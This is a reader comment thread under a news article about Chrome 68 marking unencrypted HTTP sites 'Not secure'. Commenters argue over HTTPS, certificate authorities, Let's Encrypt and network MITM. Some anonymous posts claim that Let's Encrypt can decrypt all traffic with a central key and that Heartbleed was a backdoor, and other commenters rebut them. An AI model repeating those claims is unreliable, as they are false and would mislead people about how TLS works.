back to article Google Chrome: HTTPS or bust. Insecure HTTP D-Day is tomorrow, folks

Google Chrome users who visit unencrypted websites will be confronted with warnings from tomorrow. The changes will come for surfers using the latest version of Google Chrome, version 68. Any web page not running HTTPS with a valid TLS certificate will show a "Not secure" warning in the Chrome address bar from version 68 …

  1. Tromos
    Joke

    it's likely that Microsoft, Apple and Mozilla will follow suit

    But only after Apple invent it first.

    1. Anonymous Coward
      Anonymous Coward

      Fuck Google, I will use HTTP when I want !!

      HTTP is good enough for almost everything. Hell Amazon was HTTP between 1995 and 2017. (Only their login page used HTTPS, but no other page) If HTTP is good enough for Amazon, it's good enough for 99,9% of websites anyway. And banking websites use HTTPS since forever.

      So this HTTPS movement is sponsored by NSA. So that only NSA can intercept traffic, while no other party can. But it means a lot of downsides, like when you are behind a proxy. So in 99% of web traffic HTTP is fine, yet a sponsored movement forces HTTPS. And all their front-shops (Google, Micro-$haft) enforce HTTPS. Fuck them.

      And let's not forget LAN (local area network), HTTP is fine enough there too ...get of my lawn you insensitive bastard (GOOO/M$$)

      And this centralized Let's Encrypt is shaddy - guess who is behind it, and can encrypt every of those websites with one key. Oh it's NSA. And guess why Let's Encrypt has to be dongled with a root process to update the cert every 60 days - so they can slip in a new cert when they need "special access". Not everyone is that dumb, but many are careless. And weren't all these HTTPS-websites vulnerable and very accessible to everyone, because of backdoors ("hearthbleed").

      1. ravenstar68

        Re: Fuck Google, I will use HTTP when I want !!

        You need to understand how certificates work.

        The certificate system provides a chain of certificates which end with a trusted root certificate. The list of Trusted Root Certificates is kept on the local machine and updated by the OS.

        However it's not the root certificates that are used to encrypt data, it's the actual server certificate.

        So what you could do if you were that concerned is set your cron job to create it's own new certificate and than send a certificate signing request off to Let's Encrypt every 60 days instead.

        The real problem with TLS is that not only do companies and institutions MITM TLS connections, but a good proportion of security software does as well.

        While their purpose is benign, this IMHO is a bad choice by the security vendors as it means if your security software is indeed pulling a MITM attack - you lose the chain of trust.

      2. Martin-73 Silver badge

        Re: Fuck Google, I will use HTTP when I want !!

        I think you might be going into tinfoil hat territory with mention of the NSA, but I do agree that some things are fine over HTTP. My own site for example is an early 2000s hodgepodge of usefulish info on telephone wiring and a few pinouts of popular connectors that were useful to me so I shared them with the world.

        Nothing for Ivan (or Donald) to snoop on... so https is unnecessary

    2. alexmorco

      Re: it's likely that Microsoft, Apple and Mozilla will follow suit

      By changing URLs in the WP dashboard, all the site URLs should also be changed. If it doesn’t, you may want to force SSL to WordPress login area by configuring SSL in the wp-config.php file.

      In the wp-config.php file, add below lines of code where it says “That’s all, stop editing!”. For more you can visit: https://www.cloudways.com/blog/add-free-ssl-certificate-to-wordpress-websites

  2. Christian Berger Silver badge

    It's funny to see that now...

    since the certificate system of TLS has been largely compromised to a point where some countries and companies MITM every connection, Google decides that HTTP is insecure.

    I mean we are long past the time when a passive attacker was a realistic scenario (unless you are at a penny pinching cable ISP). If you want to track a user today, you use one of the many ad-services to do so.

    If Google had security in mind, they'd warn about websites using Javascript. Particularly when those scripts are loaded from external servers. They would gradually work on reducing the numbers of features webbrowsers need to implement to make web browsers smaller and therefore more secure.

    We now are at a point when browsers are the most complex single pieces of software a regular person comes into contact with. We now are at a point where TLS, the protocol that is supposed to save us all, is so complex that there's just a handfull of implementations around.

    This is not a healthy situation.

    1. Lee D Silver badge

      Re: It's funny to see that now...

      "to a point where some countries and companies MITM every connection,"

      They can only do that if you have physical access to the machines at either end, that's kind of the point of encryption. Commercial MITM requires you to trust a certificate that you would not encounter in the wild and would not be trusted by default in your browser.

      Governments may be different but, pretty much, they can demand you just send them the data, they don't have to decrypt it - but to decrypt it requires the end-point's co-operation. You can't sniff a connection to Facebook from a Chinese PC without Facebook or the browser manufacturer being complicit - and you can't "break" it by using other certs without cert-pinning going ape and warning the user.

      However, that said, working in a school I have a *legal requirement* to monitor every web access. Thus I have no option but to MITM every connection with an internal cert, and denying anything that doesn't present or tries to bypass that cert.

      Unfortunately, it's just not as simple as "just work out what pages the user is looking at that they shouldn't" any more.

      And that's just a UK school. Imagine what some of the big companies that deal with industrial espionage, military projects, etc. have to do to comply with what they need to..

      1. Christian Berger Silver badge

        Re: It's funny to see that now...

        Well in those countries and those governments they simply roll out their own CA. It's a huge security nightmare, of course, but that's a completely different problem.

      2. brainbone

        Re: They can only do that if...

        Unfortunately, no.

        On a visit to the KAUST campus in Saudi Arabia a few years back, the network connections available there MITM'd every HTTPS request with valid/signed wild-card certificates they were able to obtain from "trusted" CAs.

        HTTPS only works if you trust the CAs your browser trusts. When some of those CAs give out certificates to government agencies for domains the government has no business having certificates for, then you really can't trust HTTPS.

        1. Anonymous Coward
          Anonymous Coward

          Re: They can only do that if...

          Actually, the complete, accurate statement is "you really can't trust HTTPS".

          Time to design something better?

          And change the way we use it?

          1. vtcodger Silver badge

            Re: They can only do that if...

            Actually, the complete, accurate statement is "you really can't trust HTTPS".

            Probably true. OTOH I personally don't much care except when money is involved. And I try to do as little as possible involving money on-line. I find that face to face, paper, and/or telephones work better and are less inconvenient than online with proper security and are less scary than online without proper security.

            For me, most of the time, https mostly means I can't view a constantly changing array of sites in one browser or other (I have at least six installed) because their certificates have some subtle or not so subtle flaw this week.

            My guess is that most users will have no idea what Google is about with this HTTPS thing. Depending on implementation details, they will either click through any annoying error messages or will whinge until someone shows them how to switch to a different search engine.

            No, I don't know what to do about all this until folks are ready to accept that online security is a very tough problem, the toolkit we are approaching it with is entirely inadequate, and we may have to stop doing some things (e.g. Javascript) that are surely incompatible with secure computing.

            1. brym

              Re: They can only do that if...

              This is starting to sound alot like the witch-hunt that went on to kill Flash. Except, for JS, it's all just another case of history repeating.

        2. Anonymous Coward
          Anonymous Coward

          Re: They can only do that if...

          > HTTPS only works if you trust the CAs your browser trusts. When some of those CAs give out certificates to government agencies for domains the government has no business having certificates for, then you really can't trust HTTPS.

          And do you trust Let's Encrypt CA? I do NOT.

          Not only is Let's Encrypt centralized and already near monopoly for small and medium websites. They can decrypt all traffic with its central key. And most even run a Let's Encrypt cron job as ROOT on their servers. And the short 60 days cert-life means they can swap you in a new cert - with they I mean NSA and their partners.

          So, HTTP is just as secure for most stuff, and a lot simpler and safer for the server side (think heartbleed backdoor).

          1. Anonymous Coward
            Anonymous Coward

            Re: They can only do that if...

            "And do you trust Let's Encrypt CA? I do NOT"

            Let's Encrypt validates websites to exactly the same level as any other standard Certificate Authority (except for EV certs that cost a fortune). The only difference is that they don't have a credit card step in their automated process.

          2. Anonymous Coward
            Anonymous Coward

            Re: They can only do that if...

            "They can decrypt all traffic with its central key. "

            I see you don't know how CAs work.

            1. rg287 Silver badge

              Re: They can only do that if...

              I see you don't know how CAs work.

              They don't seem to have much of a handle on TLS1.3, Ephemeral Session Keys or Perfect Forward Secrecy either.

        3. hellwig Silver badge

          Re: They can only do that if...

          And lets not forget when you use Chrome, GOOGLE gets to decide which CAs you trust and don't trust. Want to know one of the "trusted" CAs? Google! That's right, Google can MITM any Chrome browser traffic they want. And why would Google want to know what you're browsing? Gee, maybe because that's how they make billions of dollars a year?

          I'm not saying they MITM anyone, but I'm only saying that because I wouldn't want to get sued.

          1. Anonymous Coward
            Anonymous Coward

            Re: They can only do that if...

            "That's right, Google can MITM any Chrome browser traffic they want."

            Why would they want to MITM it with certificate trusts, they can and do it in a far easier way, its their browser, they will just send the data they want directly.

            Surprised there wasn't a mention of Microsoft, they have theirs too, we know they don't need to use it, they just send all that data directly.

            That certificate isn't for MITM attacks, its for their issued certs on their services.

            There is a lot of paranoia here.

    2. katrinab Silver badge

      Re: It's funny to see that now...

      "I mean we are long past the time when a passive attacker was a realistic scenario (unless you are at a penny pinching cable ISP)"

      or you operate a public wifi service, possibly one with the same SSID as a large provider.

    3. Adam 1 Silver badge

      Re: It's funny to see that now...

      > I mean we are long past the time when a passive attacker was a realistic scenario

      It seems to me that no-one has shared this fact with a bunch of airlines, ISPs, pretty much every hotel you have ever stayed at.

      I'm afraid that this is pretty close to par for the course. And you can't actually see those who just track rather than actively manipulate the traffic, but I would be amazed if it wasn't an order of magnitude greater.

      Yes, TLS is imperfect because you need to trust a bunch of CAs some of which have been vaporised after spectacularly failing at their only job™, but in terms of risk management, it is night and day improvement. It's like arguing that there's no point locking your door because authorities could just open it with a carefully placed exclusive.

      Companies cannot MitM a HTTPS website unless they own the computer. If they own the computer, they can just install they're own root CA, but no hotel or airline or internet cafe or ISP can do that to my device.

  3. Anonymous Coward
    Anonymous Coward

    No can do

    My hosting will give me a certificate, but I lose PHP functionality if I do... so I won't. (I believe this is basically down to how it's being hosted in the cloud)

    Some redirects are already broken. I went to strobist.com only to be completely blocked when it redirected to strobist.blogspot.com ... and chrome wouldn't let me put in an exception. However, Firefox let me tell it that I knew what was going on.

    Net result is that a few of us have already gone back to Firefox for daily browsing, because Chrome is just too much up its own arse.

    1. Anonymous Coward
      Anonymous Coward

      Re: No can do

      " I went to strobist.com only to be completely blocked when it redirected to strobist.blogspot.com"

      use the SAN in the certificate

  4. ratfox Silver badge
    Paris Hilton

    Yay... maybe?

    On one hand, yeah security is good.

    On the other hand, I wouldn't be surprised if the people at Google were completely living in a bubble and did not understand multiple valid reasons for which websites have not switched to HTTPS. I can't even even figure out a dark ulterior motive for Google to do this, but it might simply be out of touch with reality.

    1. teknopaul Silver badge

      Re: Yay... maybe?

      One perfectly good reason is that you are publishing HTML dont have any tracking cookies and have nothing at all to hide and dont have enough viewers to be a target.

      I'm all for security where it is needed. I resent being bullied by Google.

      1. fidodogbreath Silver badge

        Re: Yay... maybe?

        I'm all for security where it is needed. I resent being bullied by Google.

        Indeed. My 4-page personal Wordpress site has absolutely no content that needs to be https-protected. The hosting company has provided free certs (via CPanel), but it has still required annoying make-work on my part.

        1. rg287 Silver badge

          Re: Yay... maybe?

          Indeed. My 4-page personal Wordpress site has absolutely no content that needs to be https-protected. The hosting company has provided free certs (via CPanel), but it has still required annoying make-work on my part.

          Aside from that bit where you send credentials (domain.com/wp-login.php)...

          Also malicious ISPs stuffing in ads, tracking cookies, coinhive.js, etc. You're not protecting your content. You're protecting your visitors...

          As for "make-work", one click-and-forget button? Hardly a problem. My hosts also enabled the Lets-Encrypt plugin in cPanel. One click to enable cert generation and then another setting to tell the server to use the certs being produced by the plugin. The work of a minute, one-off and entirely automated. I haven't touched it since.

      2. Anonymous Coward
        Anonymous Coward

        Re: Yay... maybe?

        One perfectly good reason is that you are publishing HTML dont have any tracking cookies and have nothing at all to hide and dont have enough viewers to be a target.

        ----------------------------------------------------------------------------------------------------

        This is short sighted. You are setting up any visitor to your site for a trivial MITM attack. Not cool.

        1. Eeep !

          Re: Yay... maybe?

          Please explain how this is setting up a MITM attack.

          1. Adam 1 Silver badge

            Re: Yay... maybe?

            Anyone who is in that network path can inject, modify or suppress any of the page resources. This includes injecting coinhive.js or worse. This includes "free WiFi hotspots", and probably any hotel or airline you've ever flown. Even a major US ISP was fiddling with some headers at one point. These modifications cannot be made to a HTTPS stream unless you can convince a CA to sign your public key.

            I'm not saying HTTPS is a panacea for all security ills, but I fail to see what is controversial about calling HTTP "Not Secure". It is after all, a long game of "Chinese Whispers" with no capacity to assert that what you see is what the server served or what the server sees is what you sent.

  5. Anonymous Coward
    Anonymous Coward

    stuck on HTTP

    "The Chrome update is designed to spur sites still stuck on HTTP to move over to HTTPS"

    I don't understand 'stuck on'. Why does every single website need HTTPS? Has someone assumed that all websites are eCommerce sites? I suppose you would if you were the largest advertising company on the planet, in which case you probably do only think in terms of eCommerce.

    FAIL.

    1. Lee D Silver badge

      Re: stuck on HTTP

      Any website without TLS can have its content modified on the fly by any entity in the path of the request/response.

      Thus any website could have malicious javascript (coin miners, etc.) inserted into it, which the website or visitor wouldn't be able to detect, and the ISP could change adverts to their own, add tracking code (actual real-life cases, impacting your security and privacy, as well as the funding stream of the websites you visit, etc. etc. etc.), and all kinds of other issues - even something in your router (as per recent firmware problems with some routers allowing compromise by "redirecting" your web traffic.

      HTTPS is a good thing. Just not sure about "by default". Technically, it's insecure. Yep. Absolutely 100% correct, so there's no problem highlighting that. The problem will come when it becomes difficult to say "Yes, I bloody know that's an insecure website for the billionth time, shut up already".

      1. david 12 Bronze badge

        Re: Re: stuck on HTTP

        >Thus ... the ISP could change adverts to their own ... <

        The worlds larges ad serving company thinks that websites that allow their ads to be replaced are insicure.

        Insecure in what way? Allows ads to be replaced.

    2. Wensleydale Cheese

      Re: stuck on HTTP

      "Has someone assumed that all websites are eCommerce sites?"

      There's a case for any site which demands a login to comment on articles, or worse, read them. Think of plain text passwords, and the way folks reuse the same password across sites.

      But why should anyone running a site which doesn't offer logins offer https?

      "I suppose you would if you were the largest advertising company on the planet, in which case you probably do only think in terms of eCommerce."

      They've been guilty of that for a long time.

    3. David Knapman

      Re: stuck on HTTP

      Troy Hunt has written a *specific* piece on https://www.troyhunt.com/heres-why-your-static-website-needs-https/.

      Now, you may choose to disagree with some of his examples, but in most cases nobody can point to people using HTTPS over HTTP and state that it's *less* secure.

      1. Ian 7

        Re: stuck on HTTP

        Troy Hunt also did an excellent Pluralsight course on what developers need to know about HTTPS. If you've got an account, it's definitely an eye opener

      2. teknopaul Silver badge

        Re: stuck on HTTP

        "nobody can point to people using HTTPS over HTTP and state that it's *less* secure."

        Nobody suggesting bricking up the windows of your house is less secure.

        Security where its needed.

        A house with glass windows is not in-secure. Its just a house and not a prison.

        1. Glen 1 Silver badge
          Facepalm

          Re: stuck on HTTP

          >A house with glass windows is not in-secure. Its just a house and not a prison.

          A burglar with a brick/hammer would disagree.

          People on this thread have short memories.

          Remember Phorm?

          Almost impossible over HTTPS.

    4. IGnatius T Foobar ✅

      Re: stuck on HTTP

      Why does every single website need HTTPS? Has someone assumed that all websites are eCommerce sites?

      Exactly. Perhaps you're just publishing some information for everyone to read. What happens if the page is "insecure" and someone sniffs the connection? They get to read the same information that you already published, with the intent that everyone can read it.

      You don't need to encrypt a billboard.

      1. David Knapman

        Re: stuck on HTTP

        If, every time you update your billboard, you find that someone keeps posting outrageously dangerous advice onto the middle of it, but does leave your name prominently associated with it, would you be so relaxed about leaving your billboard unsecured? The biggest risk with HTTP is content being intercepted and *replaced* en-route (malicious scripts, etc)

        Whilst there are some circumstances where HTTPS can be MITMed, it's a strictly smaller subset of the cases where HTTP can be MITMed. So if forcing everyone to abandon HTTP reduces the opportunities for MITMs (and working to further reduce MITM attacks on HTTPS are still ongoing), why are you against it?

    5. Anonymous Coward
      Anonymous Coward

      Re: stuck on HTTP

      > Why does every single website need HTTPS?

      They don't.

      HTTP will still work. You'll just get a little bit of grey text saying "Not secure" on your browser bar.

      Move along please.

      1. gnarlymarley Bronze badge

        Re: stuck on HTTP

        HTTP will still work. You'll just get a little bit of grey text saying "Not secure" on your browser bar.

        And I will welcome that text for pages such as news sites that have no logins and do not collect my information. Anyone thinking that HTTPS cannot do MITM is just ignorant.

    6. Anonymous Coward
      Anonymous Coward

      Re: stuck on HTTP

      Why does every single website need HTTPS? Has someone assumed that all websites are eCommerce sites? I suppose you would if you were the largest advertising company on the planet, in which case you probably do only think in terms of eCommerce.

      FAIL.

      =======================================================================

      The 'FAIL' is your blinkered misunderstanding of security.

      Every HTTP site creates an attack surface exposing every visitor to MITM, injection, and other attacks.

      Anyone with any sense will avoid such sites like the plague that they might be spreading.

      1. Deltics

        Re: stuck on HTTP

        > Every HTTP site creates an attack surface exposing every visitor to MITM, injection, and other attacks.

        Ironically of course, every HTTPS site is also by definition an HTTP site. The difference in the presence of SSL doesn't change the fact that the basic protocol is the same.

        The "ironically" part therefore comes from the fact that what you say about HTTP is also true about HTTPS. As soon as you put a publicly accessible site out there you have created an attack surface exposing every visitor etc etc etc. Whether that site employs HTTP or HTTPS doesn't alter the accuracy of that statement, only the difficulty involved in exploiting the attack surface you are generously providing.

        1. Anonymous Coward
          Anonymous Coward

          Re: stuck on HTTP

          "Ironically of course, every HTTPS site is also by definition an HTTP site. The difference in the presence of SSL doesn't change the fact that the basic protocol is the same."

          Actually it does. As SSL/TLS wraps the http protocol (makes a tunnel), making TLS (SSL should never be used) the base protocol for the transport layer, which is the part we are talking about. So the things that need to be looked at for vulnerabilities are in TLS not HTTP when authentication, encryption and data integrity are to be considered.

  6. Jason Bloomberg Silver badge
    FAIL

    Two wrongs don't make a right

    At the end of the proverbial day I guess it will come down to whether people consider Google being more wrong to 'block sites' than sites are to not upgrade to https.

    I suspect most people won't have an absolutist view and will just consider the greater wrong to be that Chrome doesn't have an option to turn the feature off.

    And it's no good telling people Letsencrypt certificates are free while also telling them that if they aren't paying for something then they are the product.

    I am somewhat surprised there's not been more of a Net Neutrality argument raised against Google's decision.

    1. knelmes

      Re: Two wrongs don't make a right

      "And it's no good telling people Letsencrypt certificates are free while also telling them that if they aren't paying for something then they are the product."

      I don't think that's the case with the EFF backed letsencrypt. Is it?

  7. Flakk
    Trollface

    Chrome?

    What's that?

    1. dbtx Bronze badge
      Joke

      Stuff that e.g. Firefox renders which is browser UI and not stuff from over the network.

  8. Pointer2null

    A bit hypocritical

    A bit hypocritical considering their email client defaults to remain logged in and actually forcing it to log out when you close your brower is non-trivial.

    Who cares if you browse the news unencryption - if anyone gets your machine with email logged in they can have more fun resetting all your passwords.

  9. GruntyMcPugh Silver badge

    The funnier Google related story today,....

    ... is that google Translate is throwing the occasional wobbler and predicting the end of the World.

    Select 'Maori' as the input language, and keep type the word 'dog' over and over. The translation will change to "Doomsday Clock is three minutes at twelve We are experiencing characters and a dramatic developments in the world" at 16 repetitions. At 18 repetitions it changes to "Doomsday Clock is three minutes at twelve We are experiencing characters and a dramatic developments in the world, which indicate that we are increasingly approaching the end times and Jesus' return"

    Same happens using Indonesian and Hawaiian.

    Try typing the word 'prophecy' in multiple times. Pay attention as you type, it comes up with four different creepy translations as the characters go in, not always when a complete word is typed.

    Have fun!

    1. Florida1920

      Re: The funnier Google related story today,....

      If indeed

      We are experiencing characters and a dramatic developments in the world, which indicate that we are approaching the end times and Jesus' return (Google wouldn't lie, would they?)
      I'm putting off transitioning my site to HTTPS.

  10. Anonymous Coward
    Anonymous Coward

    Letsencrypt is free but it sucks

    Sure letsencrypt is free, but for your average joe, it doesn't exactly make deployment easy.

    You can either choose to install some bloated software and trust it to run in crontab.

    Or you can hack around in DNS.

    Ok, fine, neither option are beyond the abilities of your average sysadmin (security concerns aside of third-party scripts).

    But if the likes of Google want to encourage your "average joe" to go SSL the fact that Letsencrypt decided not to support the good old-fashioned CSR root of deployment is not going to help the cause.

    Also where are Letsencrypt code-singing certificates ? Timestamping service? And so on ? Letsencrypt is the basic of the basic and seemingly no plans to go beyond it.

    You get what you pay for in this life.

    1. Pen-y-gors Silver badge

      Re: Letsencrypt is free but it sucks

      @AC

      Also where are Letsencrypt code-singing certificates

      I love the idea of singing certificates! Lines of PHP sung to Queen's greatest hits. Sing-along-a-Python. COBOL as a Bach cantata.

      1. Flashdunce

        Re: Letsencrypt is free but it sucks

        As it happens... https://github.com/dylanbeattie/rockstar

    2. Anonymous Coward
      Anonymous Coward

      Re: Letsencrypt is free but it sucks

      > Letsencrypt decided not to support the good old-fashioned CSR

      Bollocks. You *can* send a traditional CSR to Letsencrypt: e.g. using "certbot --csr" or "dehydrated --signcsr".

      Of course, you still need to validate that you own the domain using one of the various supported approaches - such as inserting a TXT record into the DNS. You can do this manually if you wish: "certbot --manual" will give you instructions on what to do interactively.

      But most people prefer not having to do this every 3 months, so they automate it.

      You can even automate signing of CSRs, using csrgrinder: https://github.com/tykling/certgrinder#csrgrinder

  11. Tom Kelsall

    I have LetsEncrypt...and...

    ...and I'm happy with it. It was a piece of P*SS to install on Wordpress and my site meets Google's requirements, and makes people using my site feel all warm and fuzzy and secure.

    That's all I needed from it - I don't understand much more than that?

    1. Mage Silver badge
      Devil

      Re: I have LetsEncrypt...and...

      Why should Google be the gatekeeper of the Internet and deciding what is acceptable? If it's such a problem lets all agree. Personally 3rd party javascript and data slurping (on almost every HTTPS site) is a bigger issue than sites you don't post on and don't log into only being HTTP.

      uMatrix, NoScript etc are more important. Why isn't the equivalent of them built into every browser. Why are 3rd party cookies not blocked by default.

      Why not have this as user set global option and also easy to change per site along with all the dreck. uMatrix does a good job of blocking garbage.

      HTTPS sites DO serve adverts. Those can have malicious javascript.

      It's worthy to encourage sites to to use HTTPS. However Google needs to get their own house in order, one of the most devious and privacy slurping companies on the planet whose "free" services exploit people to make them money from adverts.

    2. Pen-y-gors Silver badge

      Re: I have LetsEncrypt...and...

      Yes, installing Letsencrypt certs on my main reseller a/cs is a P.o.P, but adjusting the .htaccess redirects to make sure it all works, and finding the odd embedded http reference in 10-year-old code is more of a faff, and when you have dozens of sites to work through, there are other priorities. It's also tricky to explain to a small customer why you're adding an extra £50 to this year's hosting bill for a brochure-ware site.

      And sometimes not so easy on shared hosting packages.

      I suspect I'll wait until customers complain, then upgrade convert to https, and charge them for the time.

  12. Anonymous Coward
    Anonymous Coward

    LetsEncrypt and 90 days

    The other pain in the backside with LetsEncrypt is their tiny 90 day expiry window.

    Sure, if you ask LetsEncrypt, they'll try to sell you the dream of automation and how it makes expiry dates a mere technicality.

    But the scripts are not perfect. I had a LetsEncrypt covered server the other day that had renewed its certificate but not installed it correctly to the webserver.

    So, as far as LetsEncrypt and its logs were concerned, it was done. But the webserver was blissfully living in the previous era.

    Fortunatley I've got rolling 90-day (well, 85-day, so I've got fix window) reminders set in my calendar and I spotted it.

    And before anyone here pipes up "well, you could write a script to check the cert expiry", well sure, but then I need a script to check the script has run (and a script to check the script that checks the script has run).

    So yeah, there's only so far you can trust automation ....

  13. Mage Silver badge

    Stupid and arrogant

    And how is it relevant on sites you don't log into, and only read?

    Given the BLOODY illegal data slurping that Google does via analytics, search, fonts, apis and all google owned services?

    Misleading hypocrisy!

    Misleading about security too given the amount of javascript from 3rd party sites on the typical HTTPS site.

    1. JDX Gold badge

      Re: Stupid and arrogant

      El Reg included information about why it's relevant in the article. Did you read it? Did you even search for "why is HTTP relevant..." yourself?

  14. Flywheel Silver badge

    Hard times head for the "family IT guy"

    If you're one of those poor sods that provides IT support for the family and have to deal with Auntie's "if it winks at you, click it" habit, I predict you'll see an unwelcome increase in workload as panicking relatives start phoning you to say the Internet's not secure any more. Good luck!

  15. DrXym Silver badge

    Now how about a way to get a hassle free cert

    It's great that Google are doing this but it would have been even better if there were a simple, convenient way for sites to obtain a cert that:

    a) Doesn't require any major effort to obtain. i.e. I should not have to pay money or submit government documentation, or undergo a rectal exam just for a cert.

    b) Has an expiration period that I can choose. Maybe some people like their certs to expire every 12 months. Personally I'm happy for my cert to go years, decades unless I explicitly revoke it myself. IMO the main reason they expire so quick is repeat customers.

    c) Doesn't cost any money. CAs are basically a tax on trust.

    Things like Let's Encrypt have tried to make it easier to get a free key but it's still way too difficult. Just let me fill in a form, do a simple site ownership check (e.g. uploading a file to a path on the server) and get a key.

    1. Anonymous Coward
      Anonymous Coward

      Re: Now how about a way to get a hassle free cert

      "Things like Let's Encrypt have tried to make it easier to get a free key but it's still way too difficult. "

      And that's exactly the point I made above !

      If LetsEncrypt left the old-fashioned "paste your CSR in a form and upload a verification file to your website" then it would be much easier than their very convoluted process where you can't even get started without running scripts and other nonsense.

    2. Drew 11

      Re: Now how about a way to get a hassle free cert

      The tech is already there.

      It's called DNSSEC and DANE. No need to go to LetsEncrypt (who are owned by...?)

      The only thing holding up DANE are the browser manufacturers who refuse to bake it into their code.

      High time TheReg went to them and asked them "why the hell not?"

    3. Cavanuk

      Re: Now how about a way to get a hassle free cert

      "a) Doesn't require any major effort to obtain. i.e. I should not have to pay money or submit government documentation, or undergo a rectal exam just for a cert.

      b) Has an expiration period that I can choose. Maybe some people like their certs to expire every 12 months. Personally I'm happy for my cert to go years, decades unless I explicitly revoke it myself. IMO the main reason they expire so quick is repeat customers.

      c) Doesn't cost any money. CAs are basically a tax on trust."

      So you want certificates that anyone can get, with no effort or being subject to stringent checks? What would be the point of those certs? The cost results from maintaining a certificate authority that, theoretically, checks that someone actually is who they say they are. Even if they are just checking documentation, those carrying out the checks have to be paid.

      1. DrXym Silver badge

        Re: Now how about a way to get a hassle free cert

        "So you want certificates that anyone can get, with no effort or being subject to stringent checks?"

        Yes.

        "What would be the point of those certs?"

        They're better than plaintext is the point. They allow any website to encrypt their traffic so it is not visible or cached by proxies, sniffers etc. In addition if they are coupled with a service such as SSL lighthouse, the browser can check that the cert is the same one other visitors to the site see and warn the user if it is not.

        It doesn't stop somebody buying a cert if they want. I'm quite certain that browsers could imbue a cert with "trust" on a scale based on who signed it or not.

        "The cost results from maintaining a certificate authority that, theoretically, checks that someone actually is who they say they are. "

        That's the point. Theoretically.

        Browsers maintain a list of hundreds of CAs. It only takes a few bad actors and the whole concept collapses. Occasionally a CA gets delisted but not half as much as it probably should.

        Besides that, many CAs barely do more than check a passport or government doc and hand out certs like candy. It's little more than an inconvenience of money / time sink to get the damned things. A tax on security.

        The concept of signing with CA and becoming "trusted" is nonsensical. Maybe if I'm a bank I want to pay a CA to come around and audit how I store my key. Somebody running a gardening tips website just wants a cert that makes a scary browser icon go away.

        Certs should be able to scale between these two cases.

  16. Bavaria Blu

    D-Day sounds melodramatic - from tomorrow Chrome will display a subtle light grey message next to the URL. Will anyone notice?

  17. User McUser
    Big Brother

    Not Secure -vs- Not Encrypted

    I object to it being labeled as "Not Secure" when "Not Encrypted" would be far more accurate and far less nasty sounding. But that's the whole point of this, to scare users and drive site operators to use HTTPS. If a user sees "Not Encrypted" they'll either not understand or not care what that means. But calling it "Not Secure" implies that Bad Things™ will happen! Because everyone is always telling them to "Be Secure" and that this is important! And now their browser is telling them their favorite website is not secure? Well, I guess I'd better steer clear of that site until they fix it; thanks Chrome for warning me!

    But why does Google care about some random WWW server being encrypted or not? Because with plain HTTP, nearly anyone can see your data and thus access that sweet sweet nectar of your browsing history. But with HTTPS, only the browser and the site you're going to get that info. It's all about trying to stop other advertising companies from getting the same info that Google will get from Chrome users. It's aimed squarely at their competitors and has nothing to do with making anything more secure. I mean FFS, the data is only encrypted during transit - once it hits the browser or the server daemon it's right back to plain text and just as (in)secure as it was before they started using HTTPS.

    1. Anonymous Coward
      Anonymous Coward

      Re: Not Secure -vs- Not Encrypted

      "I object to it being labeled as "Not Secure" when "Not Encrypted" would be far more accurate"

      No, it isn't, it is an accurate description. HTTPS provides 3 things, authentication (you know it's the site you asked for), encryption (unreadable by 3rd parties) and data integrity (no one can modify the content in transit). HTTP lacking the first and last make it not secure.

  18. DougS Silver badge

    Like I said before

    I really hope all 10.x.x.x and 192.168.x.x addresses are exempted by default, so you don't get spurious warnings talking to local devices that have no need for HTTPS.

    1. Anonymous Coward
      Anonymous Coward

      Re: Like I said before

      And ditto for 127.0.0.1 and ::1. Also special use domains like "test", "localhost" & "invalid".

      https://tools.ietf.org/html/rfc6761

    2. Richard 12 Silver badge

      More to the point

      It is technically impossible to have a valid cert for 10.0.0.0/8, 192.168.0.0/16 or 172.16.0.0/12 IP addresses, and the same with *.local.

      Or rather, any CA that issued one would be quickly blacklisted.

      So Intranet sites and dynamic hosts on private networks simply cannot be TLS without raising the "Its dangerous to go here" warning, unless they buy a public domain purely for internal use - and risk accidentally spilling it outside their walls.

      1. Anonymous Coward
        Anonymous Coward

        Re: More to the point

        "So Intranet sites and dynamic hosts on private networks simply cannot be TLS "

        Yes they can, you have your own PKI, this can be an actual ca, or simply just creating a certificate in say openssl, creating a 'CA" (trusted signing cert). As it's an intranet, which you usually have control over the computers you add that cert in your trusted roots, all intranet sure then have a very signed by your ca, which is trusted.

        1. Richard 12 Silver badge

          Re: More to the point

          So how does one install a trusted CA on an iPhone, Mac, Android, Windows Phone, Windows XP/7/8/8.1/10 and Windows CE?

          Without asking the CEO to go into any of the scary setup menus.

          And have that happen for every BYOD anybody might ever use?

          Of course you can't because that would be a terrible security hole.

          It is not feasible to ask normal to install root certificates.

          As far as I'm aware, it's only possible for Windows machines logged onto the domain.

          1. Richard 12 Silver badge

            Re: More to the point

            Oh, and how do you do that without also making it trivial for a miscreant who gains some access to your network to man-in-the-middle attack everyone on that network?

            1. Anonymous Coward
              Anonymous Coward

              Re: More to the point

              "gains some access to your network to man-in-the-middle attack everyone on that network?"

              The CA would need to be compromised for that to happen, but as you appear to be advocating for not using https, MITM attacks don't worry you.

          2. Anonymous Coward
            Anonymous Coward

            Re: More to the point

            "So how does one install a trusted CA on an iPhone, Mac, Android, Windows Phone, Windows XP/7/8/8.1/10 and Windows CE?"

            I would say you don't really have much experience in anything other than a very small business or just home admin.

            As you have a lot of MS devices listed let's give you an MS solution for none domain joined systems, including iphones, android, mac etc. Intune.

  19. Maelstorm
    Mushroom

    What right does Google really have to dictate to independent websites on what protocols they can use? Especially on an intranet where both endpoints belong to the same entity? This is Google becoming the North Korea of the internet.

    As for getting a cert, just self-sign your own. That's what I did. I became my own CA and rolled the cert out to all machines on the LAN. It's a pain in the arse, but what can you do when you have a company who thinks they can dictate internal company policy.

    Time to dump Chrome and go for a different browser...I hear that Opera is pretty good.

    1. dbtx Bronze badge

      re: Opera

      I tried Vivaldi for a while, then I figured out that precompiled binary means severely poorly optimized. While it needed to do stuff like draw on the screen-- open the window at first, change to another tab, etc., my *audio* would crackle because the buffer size on the sound server was apparently too low to cope with the load. It probably was using tons of statically linked stuff instead of my local bits, all baked the same (sad) way. And it probably could've been mitigated by a realtime kernel, and I can't exactly get into that then or now, so... if I can't compile it, I don't care. Chromium will probably do the same opinion-pushing thing, or already has done- but at least it could be patched to piss off about security blankets.

      Q: What's the difference between a marketing campaign and wetware hacking?

      A: Powdermilk Biscuits.

    2. Cavanuk

      "What right does Google really have to dictate..." their browser, their rules. Don't like it? Use something else. Simple.

  20. Kevin McMurtrie Silver badge

    Certified authentic malware

